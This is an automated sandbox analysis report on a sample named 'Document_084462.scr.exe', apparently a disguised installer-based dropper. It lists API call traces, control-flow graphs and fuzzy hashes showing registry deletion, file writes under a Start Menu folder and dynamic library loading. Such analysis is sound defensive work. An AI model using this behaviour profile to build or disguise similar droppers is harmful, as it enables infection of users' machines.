                                                                              control_flow_graph 724 402e41-402e6a call 40625b 726 402e6f-402e73 724->726 727 402f24-402f28 726->727 728 402e79-402e7d 726->728 729 402ea2-402eb5 728->729 730 402e7f-402ea0 RegEnumValueW 728->730 732 402ede-402ee5 RegEnumKeyW 729->732 730->729 731 402f09-402f17 RegCloseKey 730->731 731->727 733 402eb7-402eb9 732->733 734 402ee7-402ef9 RegCloseKey call 4067e3 732->734 733->731 735 402ebb-402ecf call 402e41 733->735 740 402f19-402f1f 734->740 741 402efb-402f07 RegDeleteKeyW 734->741 735->734 742 402ed1-402edd 735->742 740->727 741->727 742->732
                                                                              APIs
                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402E95
                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402EE1
                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402EEA
                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F01
                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F0C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CloseEnum$DeleteValue
                                                                              • String ID:
                                                                              • API String ID: 1354259210-0
                                                                              • Opcode ID: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                                                              • Instruction ID: 6d47fb934da24c9d717e5f7ce43986d94c12ea4066fa177ccbd406c8c521aae0
                                                                              • Opcode Fuzzy Hash: 62b78b0d49bd01798b93cc74e08c59fab283fd11ef2de5059a0807e48668f6f6
                                                                              • Instruction Fuzzy Hash: D1215A71500109BBDF129F90CE89EEF7A7DEB54348F110076F909B21A0E7B49E54AAA8

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 743 700b1777-700b17b6 call 700b1b5f 747 700b17bc-700b17c0 743->747 748 700b18d6-700b18d8 743->748 749 700b17c9-700b17d6 call 700b23e0 747->749 750 700b17c2-700b17c8 call 700b239e 747->750 755 700b17d8-700b17dd 749->755 756 700b1806-700b180d 749->756 750->749 759 700b17f8-700b17fb 755->759 760 700b17df-700b17e0 755->760 757 700b180f-700b182b call 700b25b5 call 700b15b4 call 700b1272 GlobalFree 756->757 758 700b182d-700b1831 756->758 783 700b1885-700b1889 757->783 761 700b187e-700b1884 call 700b25b5 758->761 762 700b1833-700b187c call 700b15c6 call 700b25b5 758->762 759->756 763 700b17fd-700b17fe call 700b2d83 759->763 765 700b17e8-700b17e9 call 700b2af8 760->765 766 700b17e2-700b17e3 760->766 761->783 762->783 777 700b1803 763->777 774 700b17ee 765->774 772 700b17f0-700b17f6 call 700b2770 766->772 773 700b17e5-700b17e6 766->773 782 700b1805 772->782 773->756 773->765 774->777 777->782 782->756 787 700b188b-700b1899 call 700b2578 783->787 788 700b18c6-700b18cd 783->788 793 700b189b-700b189e 787->793 794 700b18b1-700b18b8 787->794 788->748 790 700b18cf-700b18d0 GlobalFree 788->790 790->748 793->794 795 700b18a0-700b18a8 793->795 794->788 796 700b18ba-700b18c5 call 700b153d 794->796 795->794 797 700b18aa-700b18ab FreeLibrary 795->797 796->788 797->794
                                                                              APIs
                                                                                • Part of subcall function 700B1B5F: GlobalFree.KERNEL32(?), ref: 700B1DD4
                                                                                • Part of subcall function 700B1B5F: GlobalFree.KERNEL32(?), ref: 700B1DD9
                                                                                • Part of subcall function 700B1B5F: GlobalFree.KERNEL32(?), ref: 700B1DDE
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B1825
                                                                              • FreeLibrary.KERNEL32(?), ref: 700B18AB
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B18D0
                                                                                • Part of subcall function 700B239E: GlobalAlloc.KERNEL32(00000040,?), ref: 700B23CF
                                                                                • Part of subcall function 700B2770: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,700B17F6,00000000), ref: 700B2840
                                                                                • Part of subcall function 700B15C6: wsprintfW.USER32 ref: 700B15F4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Global$Free$Alloc$Librarywsprintf
                                                                              • String ID:
                                                                              • API String ID: 3962662361-3916222277
                                                                              • Opcode ID: ceec7960ddf0a58340010889cc3b84f888cb30b7b389c2d9bd5715f1f13122d9
                                                                              • Instruction ID: 05f156f9bace06284eae7240be2694eb1d9e9beb337620e81e152e1ee57d1b93
                                                                              • Opcode Fuzzy Hash: ceec7960ddf0a58340010889cc3b84f888cb30b7b389c2d9bd5715f1f13122d9
                                                                              • Instruction Fuzzy Hash: 244191714002449EDB119F70DC89BCE37FBBB04B31FA44569F9079A286DFBCA98487A0
                                                                              APIs
                                                                                • Part of subcall function 00405D6E: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,?,00405DE2,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,77043420,?,C:\Users\user\AppData\Local\Temp\,00405B20,?,77043420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405D7C
                                                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D81
                                                                                • Part of subcall function 00405D6E: CharNextW.USER32(00000000), ref: 00405D99
                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                • Part of subcall function 00405925: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405968
                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires,?,00000000,000000F0), ref: 0040164D
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00401640
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                                                              • API String ID: 1892508949-3207577588
                                                                              • Opcode ID: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                                                              • Instruction ID: df70cc4d1a75ed244d2a997ae4edf05539497ac8b3a7dfb8588bf84231242a1b
                                                                              • Opcode Fuzzy Hash: f6ad316e7361aaa2cf963ae545acd1836446b01f1c1828078b15ea3b626ca648
                                                                              • Instruction Fuzzy Hash: 2811E231504104EBCF206FA5CD4099F37B0EF25329B28493BEA11B12F1D63E4A819B5E
                                                                              APIs
                                                                              • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 004020FB
                                                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,770423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                                                • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,770423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                                                • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,770423A0), ref: 004054B1
                                                                                • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                                                • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                                                • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040210C
                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,?,000000F0), ref: 00402189
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                              APIs
                                                                              • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 00402553
                                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsqE4B5.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CloseQueryValue
                                                                              APIs
                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                              • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              APIs
                                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 0040244E
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CloseDeleteValue
                                                                              APIs
                                                                              • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                              • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Window$EnableShow
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ShowWindow
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                                                                • Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                                                                • Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
                                                                                • Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Document_084462.scr.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                                              • CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: File$AttributesCreate
                                                                              • String ID:
                                                                              • API String ID: 415043291-0
                                                                              APIs
                                                                              • GetFileAttributesW.KERNELBASE(?,?,00405AC4,?,?,00000000,00405C9A,?,?,?,?), ref: 00405EC4
                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405ED8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              APIs
                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00403495,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 004059A8
                                                                              • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: CreateDirectoryErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1375471231-0
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000), ref: 700B2BB7
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              APIs
                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403457,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F7B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              APIs
                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040340D,000000FF,00793700,?,00793700,?,?,00000004,00000000), ref: 00405FAA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              APIs
                                                                              • VirtualProtect.KERNELBASE(700B505C,00000004,00000040,700B504C), ref: 700B29FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID:
                                                                              • API String ID: 71445658-0
                                                                              • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                              • Instruction ID: 981b209bfbc59ad728c3152e24748ded8346fc425447e23afb42b8d85bc6dac1
                                                                              • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                              • Instruction Fuzzy Hash: 35D0123200020DBBDF11AF90ED05FAB372DAB08350F014426FE06A4091D775D530A728
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                                                              • Instruction ID: 2ab46fc48b107f7ec410a0490fc1e10939948660fe742cc14426a6f165494095
                                                                              • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                                                              • Instruction Fuzzy Hash: 26C04C75784700BADA149B549E45F0677546B90701F158429B641A50D0CA78D410DA2C
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403468
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                              APIs
                                                                              • SendMessageW.USER32(00000028,?,?,004041A4), ref: 00404387
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                                                              • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                                                              • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                                                              • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,0040413D), ref: 00404370
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                                                              • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                                                              • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                                                              • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                                                              APIs
                                                                              • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                                                              • Instruction ID: a18cf0c9a9b021ee27972f2e0a35f90bb7c2f66644072f7244457554decb08b2
                                                                              • Opcode Fuzzy Hash: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                                                              • Instruction Fuzzy Hash: 0AD05EB3A201008BC700DFB8BE8545E73B8EA903193308837D452E2091E6B889518629
                                                                              APIs
                                                                              • GlobalAlloc.KERNELBASE(00000040,?,700B123B,?,700B12DF,00000019,700B11BE,-000000A0), ref: 700B1225
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: AllocGlobal
                                                                              • String ID:
                                                                              • API String ID: 3761449716-0
                                                                              • Opcode ID: e5cf7d5a2fef1288b440f3121cdfdcd9fc06d6b84f36fdb63cfd7daa0cc5063c
                                                                              • Instruction ID: cbda4dc8b091ed10432bda590e4d9040b933585257ee8645be647cd782a93245
                                                                              • Opcode Fuzzy Hash: e5cf7d5a2fef1288b440f3121cdfdcd9fc06d6b84f36fdb63cfd7daa0cc5063c
                                                                              • Instruction Fuzzy Hash: 7AB01272A10000DFFE00AB65CC0AF743254E700312F144140F700C0190C1B04C108534
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404884
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048AE
                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040495F
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040496A
                                                                              • lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 0040499C
                                                                              • lstrcatW.KERNEL32(?,Call), ref: 004049A8
                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049BA
                                                                                • Part of subcall function 00405A38: GetDlgItemTextW.USER32(?,?,00000400,004049F1), ref: 00405A4B
                                                                                • Part of subcall function 0040669D: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                                                                • Part of subcall function 0040669D: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                                                                • Part of subcall function 0040669D: CharNextW.USER32(?,00000000,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                                                                • Part of subcall function 0040669D: CharPrevW.USER32(?,?,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                                                              • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,?,0079FF18,?,?,000003FB,?), ref: 00404A7D
                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A98
                                                                                • Part of subcall function 00404BF1: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                                                                • Part of subcall function 00404BF1: wsprintfW.USER32 ref: 00404C9B
                                                                                • Part of subcall function 00404BF1: SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                                                              • API String ID: 2624150263-3018202500
                                                                              • Opcode ID: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
                                                                              • Instruction ID: 411b0bed4dd1c8854bcfe70218cd405116d93f5cc49f5f9e093397eef6854a11
                                                                              • Opcode Fuzzy Hash: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
                                                                              • Instruction Fuzzy Hash: 78A17FB1A00209ABDB11EFA5CD81AAF77B8EF84314F10843BF601B62D1D77C99418F69
                                                                              APIs
                                                                                • Part of subcall function 700B121B: GlobalAlloc.KERNELBASE(00000040,?,700B123B,?,700B12DF,00000019,700B11BE,-000000A0), ref: 700B1225
                                                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 700B1C8D
                                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 700B1CD5
                                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 700B1CDF
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B1CF2
                                                                              • GlobalFree.KERNEL32(?), ref: 700B1DD4
                                                                              • GlobalFree.KERNEL32(?), ref: 700B1DD9
                                                                              • GlobalFree.KERNEL32(?), ref: 700B1DDE
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B1FC8
                                                                              • lstrcpyW.KERNEL32(?,?), ref: 700B2182
                                                                              • GetModuleHandleW.KERNEL32(00000008), ref: 700B2201
                                                                              • LoadLibraryW.KERNEL32(00000008), ref: 700B2212
                                                                              • GetProcAddress.KERNEL32(?,?), ref: 700B226C
                                                                              • lstrlenW.KERNEL32(00000808), ref: 700B2286
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmp
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                              • String ID:
                                                                              • API String ID: 245916457-0
                                                                              • Opcode ID: 0eafcd615b9dedc06b368ef4c64b64af8a2ee21d99264b2e232c9d940f2b6111
                                                                              • Instruction ID: be579387dbbc07a9901c7b5bbb20d5b25aab02bc7bbc575e466ca2a74ab9d914
                                                                              • Opcode Fuzzy Hash: 0eafcd615b9dedc06b368ef4c64b64af8a2ee21d99264b2e232c9d940f2b6111
                                                                              • Instruction Fuzzy Hash: D6229D71D1424ADECB219FA4CD806EEB7F7FB04B25FA0452ED166E6380D7789A80DB50
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00402261
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CreateInstance
                                                                              • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
                                                                              • API String ID: 542301482-3207577588
                                                                              • Opcode ID: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                                                              • Instruction ID: 318f5a272383e4943f9a7a1f828131c4cf43be91e798f39f03958dcf779540d2
                                                                              • Opcode Fuzzy Hash: fcc22c8f01bdbcdde705d89c617478103ccb94e093c9448482791b895915191b
                                                                              • Instruction Fuzzy Hash: 67412771A00208AFCF00DFE4C989A9E7BB6FF48304B2045AAF515EB2D1DB799981CB54
                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402911
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: FileFindFirst
                                                                              • String ID:
                                                                              • API String ID: 1974802433-0
                                                                              • Opcode ID: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                                                              • Instruction ID: c1f6bc4fbd4392edc64dd94dfb26af21a0adc514685abdce03c7c09792edecab
                                                                              • Opcode Fuzzy Hash: 0c7a6b2e424a680001b31c7f103c053843ada1fe5638dd2d7c3b01ec370ff8d4
                                                                              • Instruction Fuzzy Hash: FAF08CB1A00104ABC700DFA4DD499AEB378EF10324F70857BE911F21E0D7B89E109B3A
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DC8
                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DD5
                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E21
